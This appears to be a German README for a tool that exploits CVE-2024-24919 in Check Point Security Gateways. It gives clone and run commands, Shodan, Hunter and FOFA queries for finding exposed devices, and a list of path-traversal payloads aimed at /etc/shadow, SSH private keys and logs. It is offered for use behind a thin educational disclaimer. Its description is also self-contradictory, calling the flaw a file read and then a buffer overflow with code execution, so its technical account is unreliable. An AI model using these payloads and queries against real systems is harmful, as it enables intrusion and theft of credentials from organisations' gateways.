
CVE-2024-24919 Exploit
Dieses Repository enthält ein Tool zur Ausnutzung der CVE-2024-24919-Schwachstelle in Check Point Security Gateways. Das Tool ist ein Multi-Scanner, der anfällige Geräte identifizieren kann, und ein Einzelziel-Exploit, der die vollständige Kontrolle über das betroffene Gerät übernehmen kann.
CVE-2024-24919 ist eine hochriskante Schwachstelle zur Offenlegung von Informationen, die es einem Angreifer ermöglicht, beliebige Dateien auf einem Check Point Security Gateway remote auszulesen. Diese Schwachstelle kann ausgenutzt werden, um sensible Informationen wie Passwörter und Konfigurationsdateien zu stehlen.
Haftungsausschluss:
Dieses Tool wird nur zu Bildungszwecken bereitgestellt. Es sollte nicht verwendet werden, um anfällige Systeme ohne ausdrückliche Zustimmung des Eigentümers anzugreifen. Die Autoren dieses Tools übernehmen keine Verantwortung für etwaige Schäden, die durch seine Nutzung entstehen.
Der Exploit funktioniert, indem er eine speziell präparierte HTTP-Anfrage an das anfällige Gerät sendet. Die Anfrage löst einen Pufferüberlauf in der Firmware des Geräts aus, der es dem Angreifer ermöglicht, beliebigen Code auszuführen. Der Exploit kann dann verwendet werden, um die vollständige Kontrolle über das Gerät zu übernehmen.
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt
Sie können ein einzelnes Ziel oder mehrere scannen!
python cve-2024-24919.py
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"
# Shodan
SHODAN: http.title="Check Point SSL Network Extender"
# Fofa Query
FOFA: title="Check Point SSL Network Extender"

$ Tool-Pfade : ```
'aCSHELL/../../../../../../../../../../../etc/passwd',
'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
'aCSHELL/../../../../../../../../../../../var/log/syslog',
'aCSHELL/../../../../../../../../../../../var/log/auth.log',
#'aCSHELL/../../../../../../../../../../../var/log/messages',
'aCSHELL/../../../../../../../../../../../etc/group',
'aCSHELL/../../../../../../../../../../../etc/shadow',
'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
'aCSHELL/../../../../../../../../../../../etc/hostname',
'aCSHELL/../../../../../../../../../../../etc/hosts',
'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```